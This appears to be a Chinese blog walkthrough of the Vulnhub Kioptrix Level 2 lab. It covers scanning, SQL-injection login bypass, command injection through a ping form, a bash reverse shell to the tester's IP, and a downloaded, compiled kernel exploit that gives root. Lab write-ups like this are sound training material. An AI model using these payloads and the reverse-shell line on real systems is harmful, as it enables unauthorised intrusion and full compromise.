【Vulnhub靶场】Kioptrix Level 2

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

常规 nmap 扫存活主机,扫端口

根据靶机IP容易得出靶机IP为 192.168.118.130

nmap -sP 192.168.118.0/24

nmap -p- 192.168.128.130

 

web渗透

存在web服务,查看web页面,发现存在登录

测试发现存在SQL注入漏洞

使用万能密码尝试登录,发现无法登录,抓取数据包发现是其符号呢被编码,直接修改数据尝试登录,OK了

登录成功,是一个ping功能,当有此功能或者其他执行命令的功能时,都可以合理的怀疑,是否可以拼接其他指令执行,测试发现有存在RCE漏洞,且有回显

127.0.0.1 && id

127.0.0.1;whoami

话不多说,直接反弹Shell走起

nc -lvvp 6666

127.0.0.1;bash -i >& /dev/tcp/192.168.118.128/6666 0>&1

得到Shell,尝试whoami命令,发现是 apache普通用户权限

提权

此时可以用提权辅助工具LinEnum

简介:

LinEnum是一款Linux文件枚举及权限提升检查工具,可以帮助渗透测试人员对linux系统漏洞或安全问题进行一键式测试

下载LinEnum工具:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

 开启服务,将本机LinEnum.sh文件上传到目标加以利用

python -m http.server 80

cd /tmp

wget 192.168.118.128/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

 查看到此系统版本信息,推测其可能存在漏洞

尝试查询此漏洞

searchsploit linux 2.6 CentOS

 

 第一个版本信息最为接近,尝试利用

Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 /  | linux/local/9545.c

 找到此漏洞exp,然后常规上传到目标

locate linux/local/9545.c

pwd

cp /usr/share/exploitdb/exploits/linux/local/9545.c /root/Desktop

wget 192.168.118.128/9545.c

 编译9545.c脚本文件并运行,whoami尝试,获得root权限

gcc -o exp 9545.c

./exp

反弹Shell

最后bash反弹Shell,成功

nc -lvvp 6666

127.0.0.1;bash -i >& /dev/tcp/192.168.118.128/6666 0>&1

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow_143

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值